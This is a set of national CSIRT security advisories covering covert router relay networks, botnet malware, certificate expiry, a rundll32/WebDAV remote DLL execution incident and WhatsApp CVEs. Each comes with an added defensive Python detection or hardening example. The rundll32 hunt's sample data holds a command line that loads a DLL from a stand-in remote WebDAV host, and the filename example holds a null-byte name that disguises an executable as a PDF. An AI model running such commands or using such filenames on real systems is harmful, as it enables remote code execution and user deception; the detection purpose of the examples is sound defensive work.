Advisory ID: NCC-CSIRT-2026-016
Summary:
The United Kingdom’s National Cyber Security Centre (NCSC), in coordination with international cybersecurity and intelligence partners, has warned of ongoing malicious cyber activities conducted by Chinese-linked threat actors using covert networks of compromised internet-connected devices to conceal cyber operations.
The attackers reportedly exploit vulnerable routers, smart devices, and internet-facing infrastructure to create stealth relay networks capable of masking malicious traffic, conducting cyber espionage, and launching cyberattacks against government agencies, critical infrastructure, and private organizations.
The infrastructure allows attackers to hide their real origin, evade attribution, and maintain long-term operational access while blending malicious traffic into legitimate internet activity. The threat poses significant risks to telecommunications providers, Internet Service Providers (ISPs), government networks, and critical national infrastructure globally, including Nigeria and the wider West African region.
Damage: Critical
Probability: High
Product(s):
- Home and Enterprise Routers
- Internet of Things (IoT) Devices
- Smart Home Appliances
- Network Edge Devices
- VPN Gateways
- Firewalls
- Customer Premises Equipment (CPE)
- Internet-Connected Cameras and Smart Devices
Version(s):
- Devices running outdated or unsupported firmware
- Devices using default or weak administrative credentials
- Unpatched SOHO (Small Office/Home Office) routers and IoT systems
- Unsupported legacy networking equipment
Platform(s):
- Broadband Internet Infrastructure
- Residential Networks
- Enterprise Networks
- Cloud-Connected IoT Environments
- Linux-Based Embedded Systems
- Router Operating Systems
- Smart Device Ecosystems
Description:
According to international cybersecurity authorities, the threat actors are building covert operational networks by compromising internet-connected devices such as routers, smart appliances, and other edge networking systems.
The attackers exploit weak passwords, outdated firmware, exposed remote administration interfaces, and unpatched vulnerabilities to gain unauthorized access to these devices. Once compromised, the devices are incorporated into hidden proxy or relay infrastructures that route malicious traffic on behalf of the attackers.
This infrastructure enables attackers to disguise their real locations and conduct malicious activities while appearing to originate from legitimate residential or enterprise internet connections. Such techniques significantly complicate cyber attribution and detection efforts.
The compromised devices may be used to:
- Relay malicious traffic
- Conduct cyber espionage
- Support command-and-control (C2) communications
- Launch Distributed Denial-of-Service (DDoS) attacks
- Facilitate credential theft and malware distribution
The advisory indicates that the threat actors specifically target poorly secured internet-facing infrastructure and leverage globally distributed networks of compromised devices to sustain persistent cyber operations.
The threat is particularly concerning because compromised devices may continue operating normally while secretly participating in malicious activities without the knowledge of device owners.
Indicators:
Organizations should monitor the following indicators:
Network Indicators
- Unusual outbound traffic from routers or IoT devices
- Persistent encrypted outbound connections to unknown IP addresses
- Abnormal DNS requests or DNS tunnelling activity
- Unexpected proxy or relay traffic originating from internal networks
- Large volumes of outbound traffic from customer premises equipment (CPE)
Device Indicators
- Unauthorized configuration changes on routers or firewalls
- Unknown administrator accounts
- Unexpected device reboots or degraded performance
- Unusual open ports or remote management services
- Firmware modifications or unauthorized scheduled tasks
Operational Indicators
- Unexpected communications with foreign IP addresses
- Detection of botnet or proxy network signatures
- Devices participating in DDoS traffic patterns
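As an added example (not part of the NCC-CSIRT advisory), the following Python script applies two of the network indicators above to constructed flow records from a customer access network: it pairs inbound connections to a CPE with outbound connections from the same CPE that start shortly afterwards and carry a similar byte volume (the footprint of a relay node), and it flags long-lived encrypted outbound sessions from CPE. The CPE address pool, the flow records and every threshold are assumptions chosen for the example.

```python
"""Relay and persistent-outbound triage over flow records (added example).

Flow records, the CPE address pool and every threshold below are constructed
for illustration; adapt them to the collector in use (NetFlow/IPFIX, Zeek
conn.log) and to the real customer address plan.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: int         # flow start, seconds since an arbitrary epoch
    src: str
    sport: int
    dst: str
    dport: int
    nbytes: int     # bytes carried from src to dst
    duration: int   # seconds


CPE_NET = "192.0.2."   # assumption: constructed customer CPE pool (RFC 5737 range)


def is_cpe(ip: str) -> bool:
    return ip.startswith(CPE_NET)


def relay_pairs(flows, window=120, tolerance=0.2):
    """Pair each inbound flow (external -> CPE) with outbound flows (CPE -> a
    different external host) that start within `window` seconds and carry a
    byte volume within `tolerance` of the inbound one. A CPE forwarding
    traffic for someone else produces such pairs repeatedly; ordinary client
    traffic rarely does."""
    inbound = [f for f in flows if not is_cpe(f.src) and is_cpe(f.dst)]
    outbound = [f for f in flows if is_cpe(f.src) and not is_cpe(f.dst)]
    pairs = defaultdict(list)
    for i in inbound:
        for o in outbound:
            if o.src != i.dst or o.dst == i.src:      # same CPE, different far end
                continue
            if not 0 <= o.ts - i.ts <= window:
                continue
            if abs(o.nbytes - i.nbytes) > tolerance * max(i.nbytes, 1):
                continue
            pairs[i.dst].append((i.src, o.dst, i.nbytes, o.nbytes))
    return dict(pairs)


def persistent_outbound(flows, min_duration=3600, ports=(443,)):
    """Long-lived outbound sessions from CPE on encrypted ports: a relay node
    or implant keeps its control channel open far longer than a browser does."""
    return [f for f in flows
            if is_cpe(f.src) and not is_cpe(f.dst)
            and f.dport in ports and f.duration >= min_duration]


def triage(flows, min_pairs=3):
    """Return {cpe: [finding, ...]} for CPE showing relay or persistence signs."""
    findings = defaultdict(list)
    for cpe, pairs in relay_pairs(flows).items():
        if len(pairs) >= min_pairs:
            far_ends = sorted({o for _, o, _, _ in pairs})
            findings[cpe].append(
                f"relay: {len(pairs)} inbound/outbound pairs with matching volume, "
                f"forwarding to {', '.join(far_ends)}")
    for f in persistent_outbound(flows):
        findings[f.src].append(
            f"persistent outbound to {f.dst}:{f.dport} for {f.duration}s")
    return dict(findings)


# Constructed sample: an ordinary subscriber (.10), a CPE relaying for
# 203.0.113.7 (.20) and a CPE holding a two-hour TLS session open (.30).
FLOWS = [
    Flow(0,   "192.0.2.10", 51000, "198.51.100.5",  443,  12000,  5),
    Flow(30,  "198.51.100.5", 443, "192.0.2.10",  51000, 480000,  5),
    Flow(100, "203.0.113.7", 40001, "192.0.2.20", 8443,  30000, 20),
    Flow(102, "192.0.2.20", 52000, "198.51.100.80", 443, 29400, 20),
    Flow(400, "203.0.113.7", 40002, "192.0.2.20", 8443,  41000, 25),
    Flow(403, "192.0.2.20", 52001, "198.51.100.80", 443, 40200, 25),
    Flow(700, "203.0.113.7", 40003, "192.0.2.20", 8443,   8800,  9),
    Flow(701, "192.0.2.20", 52002, "198.51.100.81", 443,  8600,  9),
    Flow(50,  "192.0.2.30", 53000, "203.0.113.9",  443, 2000000, 7200),
]

if __name__ == "__main__":
    for cpe, notes in triage(FLOWS).items():
        print(cpe)
        for note in notes:
            print("   ", note)
```

On real collectors the pairing should be bucketed by CPE and time before the inner loop, and the byte tolerance widened for protocols that add framing; the point of the example is the correlation itself, which a per-flow threshold on volume alone cannot express.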
Consequences:
Successful exploitation may result in:
- Unauthorized use of compromised devices as relay infrastructure for cyberattacks
- Concealment of malicious cyber operations behind legitimate residential or enterprise networks
- Data theft and cyber espionage against government and critical infrastructure organizations
- Distributed Denial-of-Service (DDoS) attacks using hijacked devices
- Reputational and attribution risks for affected Internet Service Providers
- Long-term covert access to vulnerable network environments
- Increased exposure of telecommunications infrastructure to an advanced threat actor
Threat Types:
- Advanced Persistent Threat (APT) Activity
- Cyber Espionage
- Botnet Operations
- Proxy / Relay Network Abuse
- Infrastructure Hijacking
- Covert Command-and-Control (C2) Operations
- IoT Device Exploitation
- Network Obfuscation and Evasion
Solutions/Mitigations:
NCC-CSIRT recommends the following mitigation steps:
- Monitor customer networks for unusual proxy or relay traffic patterns.
- Identify and isolate compromised routers or IoT devices.
- Enforce firmware updates and security hardening for managed devices.
- Disable unnecessary remote management interfaces.
- Deploy network anomaly detection systems to identify covert relay activity.
- Conduct threat hunting activities for covert relay or proxy traffic within enterprise and telecom networks.
- Review the security posture of all internet-facing infrastructure and edge devices.
- Monitor for signs of unauthorized access to routers, VPN devices, and firewalls.
- Collaborate with national cybersecurity authorities and ISPs to report suspicious infrastructure.
- Deploy endpoint and network monitoring solutions capable of detecting botnet or proxy activity.
References:
- https://www.ncsc.gov.uk/news/defending-against-china-nexus-covert-networks-of-compromised-devices
- https://www.ncsc.gov.uk/news/executive-summary-defending-against-china-nexus-covert-networks-of-compromised-devices
- https://www.helpnetsecurity.com/2026/04/24/ncsc-china-covert-networks-advisory/
- https://www.ncsc.gov.uk/sites/default/files/2026-04/-Defending-against-China-nexus-covert-networks-of-compromised-devices.pdf
Advisory ID: NCC-CSIRT-2026-015
Summary:
The NCC-CSIRT has observed the following cyber threats in the communications sector: increased activity involving malware strains such as Andromeda, BruteForceBot, Win.AsyncRAT, Gamut, and StealRat, which are being leveraged to orchestrate Distributed Denial-of-Service (DDoS) attacks. These malware families are used to compromise systems and form botnets capable of launching large-scale volumetric and application-layer attacks.
Damage: High
Probability: High
Product(s):
- Network Infrastructure
- Endpoints
- Servers
- Customer Premises Equipment (CPE)
Version(s):
All versions
Platform(s):
- Windows
- Linux
- Network Devices
- IoT Devices
Description:
Recent threat intelligence indicates the use of the following malware:
Andromeda: Modular botnet malware used for system compromise and DDoS operations.
BruteForceBot: Used for credential brute-force attacks and botnet recruitment.
Win.AsyncRAT: Remote access trojan enabling remote control and DDoS deployment.
Gamut: Known for spam and botnet activity, also leveraged for DDoS campaigns.
StealRat: Supports credential theft and remote control, aiding botnet expansion.
These malware strains enable attackers to build distributed botnets used to generate high volumes of malicious traffic, resulting in denial-of-service conditions.
Impacts:
- Service disruption and degradation of telecommunications services
- Network congestion and bandwidth exhaustion
- Loss of availability of critical systems and services
- Compromise of infected systems leading to further propagation
- Reputational damage and potential regulatory implications
Threat Types:
- Botnet Malware
- DDoS (Volumetric and Application Layer)
- Remote Access Trojan (RAT)
- Credential Attacks
Solutions/Mitigations:
NCC-CSIRT recommends the following mitigation steps:
- Deploy DDoS mitigation solutions (traffic filtering, rate limiting).
- Monitor network traffic for anomalies.
- Patch and update systems regularly.
- Implement endpoint protection (EDR/AV).
- Enforce strong authentication (MFA, password policies).
- Block command-and-control (C&C) communications.
- Leverage threat intelligence and share IOCs.
- Develop and test incident response plans.
References:
Advisory ID: ngCERT-2026-060004
Damage: Critical
Probability: High
Platform(s): All Systems Using Digital Certificates (Websites, APIs, Servers, IoT)
SUMMARY
ngCERT warns organisations about the severe risks posed by expired or mismanaged digital certificates. Expired or poorly handled TLS/SSL certificates can trigger sudden widespread service outages, expose systems to security attacks, erode user trust and cause significant financial and reputational damage. With shorter certificate lifespans and the growing number of certificates in use, ineffective management has become a major threat to business continuity and cybersecurity. Organisations using digital certificates are strongly advised to implement robust certificate management practices immediately.
DESCRIPTION
Digital certificates serve as machine credentials for authentication, confidentiality, and integrity in encrypted communications. Expired certificates can shut down websites, APIs, and entire enterprise systems. Key challenges include manual tracking of large numbers of certificates, lack of visibility, and failure to monitor expirations. Proper management involves discovery, monitoring for policy compliance and usage, timely rotation before expiry, and revocation of compromised certificates. Automation and centralised visibility are strongly recommended to manage the increasing volume of certificates in modern environments.
CONSEQUENCES
Failure to manage digital certificates properly may lead to:
- Service outages and downtime.
- Browser security warnings that damage user trust and reputation.
- Increased vulnerability to man-in-the-middle attacks and data interception.
- Operational disruptions affecting websites, APIs, internal systems, and connected devices.
- Compliance violations and potential financial losses from unplanned interruptions.
SOLUTION/MITIGATION
Organisations are strongly advised to apply these mitigations:
- Implement automated certificate discovery across all environments.
- Establish centralised visibility and inventory of all certificates.
- Monitor expiration dates with proactive alerts (30–90 days in advance).
- Automate certificate renewal and rotation before expiry.
- Enforce short certificate lifespans and regular rotation policies.
- Revoke compromised or misused certificates immediately.
- Adopt certificate management platforms to automate the lifecycle.
- Conduct regular audits and train teams on certificate best practices.
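The monitoring and rotation steps above can be reduced to a small amount of code once the inventory exists. As an added example (not part of the ngCERT advisory), the following Python script takes per-certificate validity dates in the format printed by `openssl x509 -noout -dates`, computes days remaining against a fixed reference time, and classifies each certificate, scaling the renewal threshold down for short-lived certificates so the alert is not permanently on. The inventory and the reference time are constructed for the example.

```python
"""Certificate expiry triage from `openssl x509 -noout -dates` output (added example).

The inventory below is constructed; in practice the two date lines come from
`openssl x509 -noout -dates -in cert.pem` (or a TLS scan) per certificate.
"""
from datetime import datetime, timezone

OPENSSL_FMT = "%b %d %H:%M:%S %Y GMT"


def parse_openssl_date(line: str) -> datetime:
    """Parse 'notAfter=May  2 23:59:59 2026 GMT' (note openssl's padded day)."""
    value = line.split("=", 1)[1]
    value = " ".join(value.split())            # collapse the padding space
    return datetime.strptime(value, OPENSSL_FMT).replace(tzinfo=timezone.utc)


def renewal_threshold(lifetime_days: int) -> int:
    """Days before expiry by which renewal should already be done: 30 days for
    conventional lifetimes, a third of the lifetime for short-lived certs."""
    return max(3, min(30, lifetime_days // 3))


def classify(not_before: datetime, not_after: datetime, now: datetime) -> dict:
    lifetime = (not_after - not_before).days
    left = (not_after - now).days
    threshold = renewal_threshold(lifetime)
    critical = max(1, threshold // 4)          # 7 days for a 30-day threshold
    if left < 0:
        status = "expired"
    elif left <= critical:
        status = "critical"
    elif left <= threshold:
        status = "renew"
    else:
        status = "ok"
    return {"lifetime_days": lifetime, "days_left": left,
            "threshold_days": threshold, "status": status}


def triage_inventory(inventory, now):
    """inventory: {name: (notBefore line, notAfter line)} -> {name: classification}.
    Unparseable entries are reported rather than silently skipped, because a
    certificate that cannot be read is one that cannot be rotated on time."""
    report = {}
    for name, (nb_line, na_line) in inventory.items():
        try:
            nb, na = parse_openssl_date(nb_line), parse_openssl_date(na_line)
        except (ValueError, IndexError) as exc:
            report[name] = {"status": "unparseable", "error": str(exc)}
            continue
        report[name] = classify(nb, na, now)
    return report


# Constructed inventory, evaluated at a fixed instant for repeatability.
NOW = datetime(2026, 5, 1, tzinfo=timezone.utc)
INVENTORY = {
    "api.example.test":    ("notBefore=Jan  1 00:00:00 2026 GMT", "notAfter=Jan  1 00:00:00 2027 GMT"),
    "www.example.test":    ("notBefore=Feb  1 00:00:00 2026 GMT", "notAfter=May  2 23:59:59 2026 GMT"),
    "legacy.example.test": ("notBefore=May  1 00:00:00 2025 GMT", "notAfter=Apr 30 23:59:59 2026 GMT"),
    "short.example.test":  ("notBefore=Mar 30 00:00:00 2026 GMT", "notAfter=May 14 23:59:59 2026 GMT"),
    "broken.example.test": ("notBefore=garbage", "notAfter=garbage"),
}

if __name__ == "__main__":
    for name, result in triage_inventory(INVENTORY, NOW).items():
        print(f"{name:22} {result['status']:12} {result}")
```

Feeding this from a scheduled job and paging on `critical`, `expired` and `unparseable` covers the "proactive alerts" step; the `renew` tier is the trigger for the automated rotation the advisory recommends.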
HYPERLINK
- https://www.youtube.com/watch?v=V7EgIMWOqgw
- https://cwe.mitre.org/data/definitions/298.html
- https://owasp.org/Top10/2021/A02_2021-Cryptographic_Failures/
Advisory ID: NCC-CSIRT-2026-024
Summary:
A Remote Code Execution (RCE) incident involving the execution of malicious code on a Windows endpoint has been observed within the Communications Sector. The activity involved the abuse of legitimate Windows components to retrieve and execute a malicious payload from a remote server, allowing unauthorized code execution on the affected system.
This technique can enable threat actors to compromise endpoints, evade traditional security controls, and potentially establish further access within a network. Organizations are advised to review their security controls and implement the recommended mitigation measures to reduce the risk of similar attacks.
Damage: High
Probability: High
Product(s):
Microsoft Windows Operating System
Version(s):
All versions supporting WebClient/WebDAV and rundll32 execution (various Windows builds).
Platform(s):
Windows endpoints in enterprise and communications infrastructure environments.
Description:
A Remote Code Execution (RCE) incident was observed in which a threat actor leveraged Windows native functionality to remotely retrieve and execute a malicious DLL payload. The attack utilized a Living-off-the-Land (LotL) technique involving the execution of rundll32.exe through cmd.exe, combined with the abuse of the Windows WebClient service and WebDAV protocol.
The malicious payload was hosted on attacker-controlled infrastructure and delivered over HTTPS through a WebDAV-accessible UNC path (the \\host@SSL\... form that the Windows WebClient mini-redirector understands). When rundll32.exe requested that path, the WebClient service translated the request into WebDAV traffic and fetched the DLL, so the payload was loaded and executed without a conventional download artefact. The file is not entirely absent from disk, however: the WebClient service stages fetched files in its own cache under the LocalService profile (the TfsStore\Tfs_DAV directory), which is where forensic examiners should look for a copy.
Observed indicators included suspicious cmd.exe → rundll32.exe process chains, WebDAV-related HTTPS traffic including use of the HTTP PROPFIND method, remote DLL execution, and communication with a newly registered domain used for payload delivery. This technique can significantly reduce forensic visibility and increase the likelihood of evading conventional file-based security controls.
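As an added example (not part of the NCC-CSIRT advisory), the following Python hunt turns the observed indicators into a check that can be run over exported telemetry: it looks for rundll32.exe whose command line points at a remote UNC path using WebDAV syntax (@SSL, @port or DavWWWRoot) or loading a DLL from a remote share, notes whether cmd.exe was the parent, and joins the hit to PROPFIND requests from the same endpoint to the same remote host in a proxy log. The process events, the proxy log lines, their field layout and the remote host name are constructed assumptions, not data from the incident.

```python
"""Hunt for rundll32 loading a DLL over a WebDAV UNC path (added example).

Events and proxy lines are constructed; field names follow a generic
EDR/Sysmon process-creation shape and a generic proxy access log rather than
any particular product's schema.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Matches \\host@SSL\DavWWWRoot\dir\file.dll, \\host@SSL@443\..., \\host\share\x.dll
UNC_RE = re.compile(
    r"\\\\(?P<host>[\w.-]+)(?P<dav>(?:@SSL)?(?:@\d+)?)\\(?P<path>[^\s\"',]+)", re.I)
LOLBINS = {"rundll32.exe"}   # extend with other proxy-execution binaries as needed


def webdav_unc(cmdline: str):
    """Return (host, path, reasons) when the command line references a remote
    UNC path that uses WebDAV syntax or names a DLL, else None."""
    m = UNC_RE.search(cmdline)
    if not m:
        return None
    host, dav, path = m.group("host"), m.group("dav"), m.group("path")
    reasons = []
    if dav or path.lower().startswith("davwwwroot"):
        reasons.append("WebDAV UNC syntax (@SSL/@port or DavWWWRoot)")
    if path.lower().endswith(".dll"):
        reasons.append("DLL loaded from a remote share")
    return (host.lower(), path, reasons) if reasons else None


def suspicious_processes(events):
    out = []
    for ev in events:
        if ev["image"].rsplit("\\", 1)[-1].lower() not in LOLBINS:
            continue
        hit = webdav_unc(ev["cmdline"])
        if not hit:
            continue
        host, path, reasons = hit
        if ev["parent"].rsplit("\\", 1)[-1].lower() == "cmd.exe":
            reasons.append("spawned by cmd.exe")
        out.append({"ts": ev["ts"], "endpoint": ev["host"], "remote": host,
                    "path": path, "reasons": reasons})
    return out


def propfind_index(proxy_lines):
    """Map remote host -> [(ts, endpoint)] for PROPFIND requests (WebDAV probes)."""
    idx = defaultdict(list)
    for line in proxy_lines:
        ts, endpoint, method, url, _status = line.split()
        if method.upper() == "PROPFIND":
            idx[urlparse(url).hostname.lower()].append((int(ts), endpoint))
    return idx


def hunt(events, proxy_lines, window=300):
    """Join process hits with PROPFIND traffic from the same endpoint to the
    same remote host within `window` seconds."""
    idx = propfind_index(proxy_lines)
    findings = suspicious_processes(events)
    for f in findings:
        for ts, endpoint in idx.get(f["remote"], []):
            if endpoint == f["endpoint"] and abs(ts - f["ts"]) <= window:
                f["reasons"].append(f"PROPFIND to {f['remote']} at t={ts}")
    return findings


# Constructed sample data: one malicious chain on WS01, one benign rundll32 on WS02.
PROCESS_EVENTS = [
    {"ts": 1000, "host": "WS01",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\files.example-cdn.test@SSL\DavWWWRoot\update\loader.dll,Start"},
    {"ts": 1200, "host": "WS02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]
PROXY_LOG = [
    "1001 WS01 PROPFIND https://files.example-cdn.test/update/ 207",
    "1002 WS01 GET https://files.example-cdn.test/update/loader.dll 200",
    "1300 WS02 GET https://www.example.test/ 200",
]

if __name__ == "__main__":
    for f in hunt(PROCESS_EVENTS, PROXY_LOG):
        print(f["endpoint"], f["remote"], f["path"])
        for reason in f["reasons"]:
            print("   ", reason)
```

The benign rundll32 invocation on WS02 is ignored because its DLL path is local; the WS01 chain is reported with every reason that applied, which is the detail an analyst needs when tuning the rule against the environment's own false positives.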
If successful, the attack may result in unauthorized code execution, endpoint compromise, persistence, credential theft, lateral movement, and further malicious activity within the affected environment.
Impacts:
Successful exploitation may result in:
- Full remote execution of attacker-controlled code on endpoints
- Execution of malicious DLL payloads without writing files to disk
- Potential credential theft or system manipulation
- Possible lateral movement across enterprise networks
- Reduced detection due to legitimate Windows process abuse
- Compromise of user endpoints in communications environments
Threat Types:
- Remote Code Execution (RCE)
- Living-off-the-Land (LOLBIN) Abuse
- WebDAV-based Payload Delivery
- Command Execution via Native Windows Tools
- Endpoint Evasion Techniques
Solutions/Mitigations:
NCC-CSIRT recommends the following mitigation steps:
- Disable unnecessary WebDAV services and functionality.
- Monitor for suspicious cmd.exe and rundll32.exe execution.
- Restrict outbound WebDAV and remote file-share access where possible.
- Block known malicious domains and indicators of compromise.
- Enable enhanced endpoint monitoring and command-line logging.
- Conduct threat hunting for similar activity across the environment.
- Review EDR rules to detect abuse of legitimate Windows utilities.
- Investigate affected systems and remediate identified threats.
References:
Advisory ID: ngCERT-2026-050005
SUMMARY
A vulnerability has been identified in WhatsApp on iOS, Android, and Windows involving the processing of rich media responses linked to Instagram Reels content, tracked as CVE-2026-23866. The vulnerability may allow attackers to manipulate embedded metadata and trigger arbitrary or attacker-controlled URLs. This flaw can be exploited remotely through crafted messages, enabling phishing, malicious redirection, and potential cross-application invocation via unsafe URL handling. The issue increases exposure to social engineering-driven attacks within trusted messaging environments.
DESCRIPTION
The vulnerability CVE-2026-23866 is caused by inadequate validation of AI-generated rich response messages linked to Instagram Reels within WhatsApp. When users receive or interact with such messages, the application fails to properly validate embedded media URLs, allowing attackers to craft content that forces the victim's device to retrieve and process data from attacker-controlled sources and potentially triggers operating-system URL scheme handlers without user consent. It affects WhatsApp for iOS (v2.25.8.0 – v2.26.15.72) and WhatsApp for Android (v2.25.8.0 – v2.26.7.10). Separately, CVE-2026-23863 affects WhatsApp for Windows (versions prior to v2.3000.1032164386.258709). It is classified as an attachment spoofing vulnerability arising from improper handling of filenames containing embedded null bytes (\x00): the application and the operating system interpret such a filename differently, so an attacker can make a malicious file appear as a legitimate attachment. Exploitation requires only minimal user interaction (a single click) and no special privileges.
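The null-byte mismatch behind CVE-2026-23863 is a general flaw class, and the following Python example (added here; an illustrative model, not WhatsApp's code) shows both halves of it: a UI layer that derives the icon and label from the whole string, a lower layer with C-string semantics that stops at the first NUL, and a hardened normaliser that rejects such names before they reach either. The spoofed filename and the list of dangerous extensions are constructed for the example.

```python
"""Filename interpretation mismatch behind null-byte attachment spoofing (added example).

Illustrative model of the flaw class, not any messaging client's code: the UI
picks its label from the last extension of the full string, while a C-string
based file API stops at the first NUL, so the two layers disagree on the file.
"""
import re

# Assumption for the example: types a messaging client should never hand to the OS as-is.
DANGEROUS_EXT = {"exe", "scr", "bat", "cmd", "com", "pif", "js", "vbs",
                 "hta", "lnk", "msi", "dll"}


def ui_extension(name: str) -> str:
    """What a high-level UI derives from the whole string (icon, 'PDF' label)."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def os_level_name(name: str) -> str:
    """What reaches a C-string based file API: everything up to the first NUL."""
    return name.split("\x00", 1)[0]


def is_consistent(name: str) -> bool:
    """True when both layers agree on the effective extension."""
    return ui_extension(name) == ui_extension(os_level_name(name))


_CONTROL = re.compile(r"[\x00-\x1f\x7f]")
_SEP = re.compile(r"[\\/]")


def sanitize_attachment_name(name: str) -> str:
    """Hardened normalisation: reject control characters (NUL included) and
    path separators, drop leading dots, confirm the extension shown to the
    user is the one the OS will act on, and refuse executable types."""
    if _CONTROL.search(name) or _SEP.search(name):
        raise ValueError("control character or path separator in filename")
    cleaned = name.strip().lstrip(".")
    if not cleaned:
        raise ValueError("empty filename")
    if not is_consistent(cleaned):
        # Unreachable once NUL is rejected above; kept so the two layers are
        # checked against each other even if the character filter changes.
        raise ValueError("ambiguous extension")
    if ui_extension(cleaned) in DANGEROUS_EXT:
        raise ValueError(f"executable attachment type .{ui_extension(cleaned)}")
    return cleaned


def is_safe_attachment_name(name: str) -> bool:
    try:
        sanitize_attachment_name(name)
        return True
    except ValueError:
        return False


# Constructed attacker-supplied name: a PDF to the UI, an .exe to the OS.
SPOOFED = "Q1_invoice.exe\x00.pdf"

if __name__ == "__main__":
    print("UI shows   :", ui_extension(SPOOFED))       # pdf
    print("OS receives:", os_level_name(SPOOFED))      # Q1_invoice.exe
    print("consistent :", is_consistent(SPOOFED))      # False
    print("accepted   :", is_safe_attachment_name(SPOOFED))  # False
```

The defensive point is that validation has to happen on the exact bytes that will be passed to the file API, and that rejecting control characters outright is simpler and safer than trying to reconcile two layers' views of the same string.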
Damage: Critical
Probability: Medium
Platform(s): iOS, Android, Windows
CONSEQUENCES
Successful exploitation of the vulnerability could lead to:
- Execution of malicious or unintended URL schemes.
- Unauthorised invocation of system-level applications or services.
- Delivery of phishing content or malware.
- Attachment spoofing, resulting in user deception.
- Potential compromise of sensitive information and device security
SOLUTION/MITIGATION
ngCERT advises the following measures:
- Update WhatsApp for iOS, Android and Windows to versions later than v2.26.15.72, v2.26.7.10 and v2.3000.1038897100.261501, respectively.
- Apply mobile device management (MDM) policies enforcing mandatory app updates across enterprise environments.
- Monitor network traffic for anomalous URL scheme invocations originating from messaging applications.
- Educate users about risks associated with AI-generated rich media content in messaging platforms.
HYPERLINK
- https://www.whatsapp.com/security/advisories/2026
- https://cyberpress.org/whatsapp-flaw-lets-attackers-use-instagram/
- https://cybersecuritynews.com/whatsapp-vulnerability-leverage-instagram-reels/